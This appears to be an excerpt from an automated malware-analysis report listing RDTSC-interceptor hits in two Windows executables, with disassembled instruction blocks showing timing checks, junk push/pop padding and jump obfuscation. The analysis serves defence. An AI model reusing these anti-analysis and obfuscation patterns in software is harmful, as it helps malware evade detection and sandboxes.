Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5054D second address: 4F50591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF15CB3B713h 0x0000000d push 755727D0h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75600140h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 push edi 0x00000054 jmp 00007FF0EC517C88h 0x00000059 pop ecx 0x0000005a call 00007FF0EC517C7Bh 0x0000005f mov esi, 26B0FC5Fh 0x00000064 pop esi 0x00000065 popad 0x00000066 and dword ptr [ebp-04h], 00000000h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50591 second address: 4F50595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50595 second address: 4F50599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50599 second address: 4F5059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5059F second address: 4F505CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0EC517C85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505CC second address: 4F50601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007FF0EC6B64D3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF0EC6B64D5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50601 second address: 4F50611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50611 second address: 4F50615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50722 second address: 4F50727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50727 second address: 4F50738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a dec edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50738 second address: 4F5073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5073E second address: 4F50744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50744 second address: 4F50748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50748 second address: 4F50786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [edi+01h] 0x0000000e jmp 00007FF0EC6B64D0h 0x00000013 mov al, byte ptr [edi+01h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF0EC6B64CAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50786 second address: 4F5078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5078C second address: 4F50819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007FF0EC6B64D0h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov si, 146Dh 0x00000016 jmp 00007FF0EC6B64CAh 0x0000001b popad 0x0000001c jne 00007FF15CCCE784h 0x00000022 pushad 0x00000023 jmp 00007FF0EC6B64CEh 0x00000028 popad 0x00000029 mov ecx, edx 0x0000002b jmp 00007FF0EC6B64D7h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007FF0EC6B64D6h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FF0EC6B64CAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50819 second address: 4F50828 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50828 second address: 4F508AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF0EC6B64CFh 0x00000008 pop eax 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, edx 0x00000011 jmp 00007FF0EC6B64CBh 0x00000016 and ecx, 03h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF0EC6B64D4h 0x00000020 and esi, 3D6926B8h 0x00000026 jmp 00007FF0EC6B64CBh 0x0000002b popfd 0x0000002c push eax 0x0000002d mov ecx, edi 0x0000002f pop edi 0x00000030 popad 0x00000031 rep movsb 0x00000033 jmp 00007FF0EC6B64CEh 0x00000038 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000003f jmp 00007FF0EC6B64D0h 0x00000044 mov eax, ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 movzx eax, dx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508AD second address: 4F508DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF0EC517C85h 0x0000000c jmp 00007FF0EC517C7Bh 0x00000011 popfd 0x00000012 popad 0x00000013 mov ecx, dword ptr [ebp-10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508DF second address: 4F508E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508E5 second address: 4F5094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 jmp 00007FF0EC517C80h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FF0EC517C7Eh 0x0000001c pushfd 0x0000001d jmp 00007FF0EC517C82h 0x00000022 and ax, 2A98h 0x00000027 jmp 00007FF0EC517C7Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, C986h 0x00000036 push edi 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5094A second address: 4F50980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50980 second address: 4F50524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 jmp 00007FF0EC517C80h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF0EC517C7Eh 0x00000015 jmp 00007FF0EC517C85h 0x0000001a popfd 0x0000001b mov esi, 35FA5CD7h 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 mov ah, 0Fh 0x00000025 jmp 00007FF0EC517C85h 0x0000002a popad 0x0000002b retn 0008h 0x0000002e cmp dword ptr [ebp-2Ch], 10h 0x00000032 mov eax, dword ptr [ebp-40h] 0x00000035 jnc 00007FF0EC517C75h 0x00000037 push eax 0x00000038 lea edx, dword ptr [ebp-00000590h] 0x0000003e push edx 0x0000003f call esi 0x00000041 push 00000008h 0x00000043 pushad 0x00000044 movsx ebx, si 0x00000047 mov si, 4EBFh 0x0000004b popad 0x0000004c push 08E154FDh 0x00000051 jmp 00007FF0EC517C7Bh 0x00000056 xor dword ptr [esp], 7DBF48D5h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50B55 second address: 4F50B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50B7C second address: 4F50C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF0EC517C84h 0x00000011 adc ax, 0FC8h 0x00000016 jmp 00007FF0EC517C7Bh 0x0000001b popfd 0x0000001c call 00007FF0EC517C88h 0x00000021 pushfd 0x00000022 jmp 00007FF0EC517C82h 0x00000027 adc ecx, 16035558h 0x0000002d jmp 00007FF0EC517C7Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF0EC517C85h 0x0000003e and ecx, 767C08F6h 0x00000044 jmp 00007FF0EC517C81h 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007FF0EC517C80h 0x00000050 sbb ecx, 1D3A1A18h 0x00000056 jmp 00007FF0EC517C7Bh 0x0000005b popfd 0x0000005c popad 0x0000005d pop ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 call 00007FF0EC517C7Bh 0x00000066 pop esi 0x00000067 pushfd 0x00000068 jmp 00007FF0EC517C89h 0x0000006d and esi, 33A35E66h 0x00000073 jmp 00007FF0EC517C81h 0x00000078 popfd 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50C8A second address: 4F50C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50C9A second address: 4F50C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: 9BED6A second address: 9BED7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37FCC second address: B37FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B370A5 second address: B370AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37607 second address: B3760D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3760D second address: B37613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37613 second address: B37620 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37620 second address: B37630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378DC second address: B378E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378E7 second address: B378F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378F3 second address: B37924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f jmp 00007FF0EC517C7Fh 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37924 second address: B3792A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3792A second address: B3793C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF0EC517C7Ch 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B377 second address: B3B40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF0EC6B64C8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC6B64CDh 0x00000018 pop eax 0x00000019 push esi 0x0000001a jmp 00007FF0EC6B64D6h 0x0000001f pop edi 0x00000020 push 00000003h 0x00000022 jnl 00007FF0EC6B64CCh 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D1CAFh] 0x00000030 push 00000003h 0x00000032 jmp 00007FF0EC6B64D6h 0x00000037 mov dword ptr [ebp+122D3228h], edx 0x0000003d call 00007FF0EC6B64C9h 0x00000042 jmp 00007FF0EC6B64D9h 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B40C second address: B3B489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C88h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FF0EC517C82h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007FF0EC517C7Eh 0x0000001d push esi 0x0000001e jnc 00007FF0EC517C76h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 je 00007FF0EC517C88h 0x0000002f pushad 0x00000030 jmp 00007FF0EC517C7Ah 0x00000035 jns 00007FF0EC517C76h 0x0000003b popad 0x0000003c pop eax 0x0000003d mov dword ptr [ebp+122D1C3Ah], ecx 0x00000043 lea ebx, dword ptr [ebp+12450150h] 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c ja 00007FF0EC517C7Ch 0x00000052 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B653 second address: B3B662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CBh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B662 second address: B3B688 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C85h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B688 second address: B3B69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B69C second address: B3B6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C84h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FF0EC517C78h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a call 00007FF0EC517C79h 0x0000002f pushad 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B6E5 second address: B3B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jnc 00007FF0EC6B64C6h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FF0EC6B64D7h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FF0EC6B64CDh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007FF0EC6B64C6h 0x00000029 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B728 second address: B3B72E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B72E second address: B3B7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 pop eax 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D2CB3h], ecx 0x0000001a mov edi, 51D9B0A6h 0x0000001f popad 0x00000020 push 00000003h 0x00000022 pushad 0x00000023 add si, 1665h 0x00000028 movzx eax, di 0x0000002b popad 0x0000002c push 00000000h 0x0000002e call 00007FF0EC6B64D1h 0x00000033 mov ecx, eax 0x00000035 pop esi 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FF0EC6B64C8h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 call 00007FF0EC6B64C9h 0x00000057 jmp 00007FF0EC6B64D3h 0x0000005c push eax 0x0000005d je 00007FF0EC6B64CEh 0x00000063 jnc 00007FF0EC6B64C8h 0x00000069 mov eax, dword ptr [esp+04h] 0x0000006d pushad 0x0000006e jmp 00007FF0EC6B64CBh 0x00000073 jbe 00007FF0EC6B64CCh 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B7F6 second address: B3B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push edi 0x00000008 jno 00007FF0EC517C78h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC517C88h 0x00000018 pop eax 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF0EC517C78h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FF0EC517C7Ch 0x00000038 lea ebx, dword ptr [ebp+12450164h] 0x0000003e pushad 0x0000003f push edi 0x00000040 xor di, 9231h 0x00000045 pop edx 0x00000046 stc 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c je 00007FF0EC517C76h 0x00000052 pop edi 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B313A6 second address: B313AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B313AC second address: B313B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B58F67 second address: B58F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5938D second address: B59391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59391 second address: B59395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B594F0 second address: B59501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59501 second address: B5951E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59805 second address: B59816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF0EC517C76h 0x00000009 jl 00007FF0EC517C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59816 second address: B5983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnc 00007FF0EC6B64C6h 0x00000010 jmp 00007FF0EC6B64D6h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599BB second address: B599BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599BF second address: B599D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599D8 second address: B599DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599DC second address: B599FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC6B64C6h 0x00000008 jmp 00007FF0EC6B64D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599FA second address: B59A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59A06 second address: B59A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59A0A second address: B59A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D00 second address: B59D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D04 second address: B59D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
